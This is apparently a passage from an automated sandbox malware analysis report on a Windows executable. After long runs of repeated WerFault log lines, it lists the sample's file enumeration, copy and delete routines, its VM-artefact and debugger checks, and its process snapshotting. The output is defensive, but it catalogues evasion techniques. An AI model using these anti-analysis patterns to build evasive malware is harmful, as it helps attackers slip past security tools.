                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-26377
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeEvaded block: after key decisiongraph_0-27538
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeAPI coverage: 6.5 %
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0040E430
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_004138B0
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,0_2_00414570
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00414910
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0040ED20
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0040BE70
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040DE10
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004016D0
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0040DA80
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,0_2_00413EA0
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040F6B0
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_0091C0D7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0091C0D7
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_0091DCE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0091DCE7
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_0091E077 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0091E077
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_0091F917 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0091F917
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_00924107 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00924107
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_00911937 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00911937
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_0091E697 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0091E697
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_0091EF87 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0091EF87
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_009247D7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_009247D7
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_00923B17 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00923B17
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_00924B77 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00924B77
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_00401160 GetSystemInfo,ExitProcess,0_2_00401160
                      Source: Amcache.hve.3.drBinary or memory string: VMware
                      Source: Amcache.hve.3.drBinary or memory string: VMware Virtual USB Mouse
                      Source: Amcache.hve.3.drBinary or memory string: vmci.syshbin
                      Source: Amcache.hve.3.drBinary or memory string: VMware, Inc.
                      Source: Amcache.hve.3.drBinary or memory string: VMware20,1hbin@
                      Source: Amcache.hve.3.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                      Source: Amcache.hve.3.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: Amcache.hve.3.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                      Source: gMkw55jZRs.exe, 00000000.00000002.1904696174.0000000000A29000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: Amcache.hve.3.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: Amcache.hve.3.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                      Source: Amcache.hve.3.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                      Source: gMkw55jZRs.exe, 00000000.00000002.1904673836.00000000009AA000.00000040.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware(
                      Source: Amcache.hve.3.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: gMkw55jZRs.exe, 00000000.00000002.1904696174.00000000009F9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX
                      Source: Amcache.hve.3.drBinary or memory string: vmci.sys
                      Source: Amcache.hve.3.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                      Source: Amcache.hve.3.drBinary or memory string: vmci.syshbin`
                      Source: Amcache.hve.3.drBinary or memory string: \driver\vmci,\driver\pci
                      Source: Amcache.hve.3.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: Amcache.hve.3.drBinary or memory string: VMware20,1
                      Source: Amcache.hve.3.drBinary or memory string: Microsoft Hyper-V Generation Counter
                      Source: Amcache.hve.3.drBinary or memory string: NECVMWar VMware SATA CD00
                      Source: Amcache.hve.3.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                      Source: gMkw55jZRs.exe, 00000000.00000002.1904673836.00000000009AA000.00000040.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                      Source: Amcache.hve.3.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                      Source: Amcache.hve.3.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                      Source: Amcache.hve.3.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                      Source: Amcache.hve.3.drBinary or memory string: VMware PCI VMCI Bus Device
                      Source: Amcache.hve.3.drBinary or memory string: VMware VMCI Bus Device
                      Source: Amcache.hve.3.drBinary or memory string: VMware Virtual RAM
                      Source: Amcache.hve.3.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                      Source: Amcache.hve.3.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeAPI call chain: ExitProcess graph end nodegraph_0-26362
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeAPI call chain: ExitProcess graph end nodegraph_0-26365
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeAPI call chain: ExitProcess graph end nodegraph_0-26376
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeAPI call chain: ExitProcess graph end nodegraph_0-26383
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeAPI call chain: ExitProcess graph end nodegraph_0-26250
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeAPI call chain: ExitProcess graph end nodegraph_0-26405
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeAPI call chain: ExitProcess graph end nodegraph_0-26204
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_004045C0 lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,GetProcessHeap,RtlAllocateHeap,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,LdrInitializeThunk,lstrlenA,strlen,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,VirtualProtect,0_2_004045C0
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041AD48
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_004045C0 VirtualProtect ?,00000004,00000100,000000000_2_004045C0
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00419860
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_00419750 mov eax, dword ptr fs:[00000030h]0_2_00419750
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_00910D90 mov eax, dword ptr fs:[00000030h]0_2_00910D90
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_009299B7 mov eax, dword ptr fs:[00000030h]0_2_009299B7
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_0091092B mov eax, dword ptr fs:[00000030h]0_2_0091092B
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_009AAABB push dword ptr fs:[00000030h]0_2_009AAABB
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_00417850 GetProcessHeap,HeapAlloc,GetUserNameA,0_2_00417850
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041AD48
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_0041CEEA SetUnhandledExceptionFilter,0_2_0041CEEA
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_0041B33A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041B33A
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_0092B5A1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0092B5A1
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_0092D151 SetUnhandledExceptionFilter,0_2_0092D151
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_0092AFAF memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0092AFAF
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeMemory protected: page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: Yara matchFile source: Process Memory Space: gMkw55jZRs.exe PID: 6876, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\gMkw55jZRs.exeCode function: 0_2_00419600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00419600
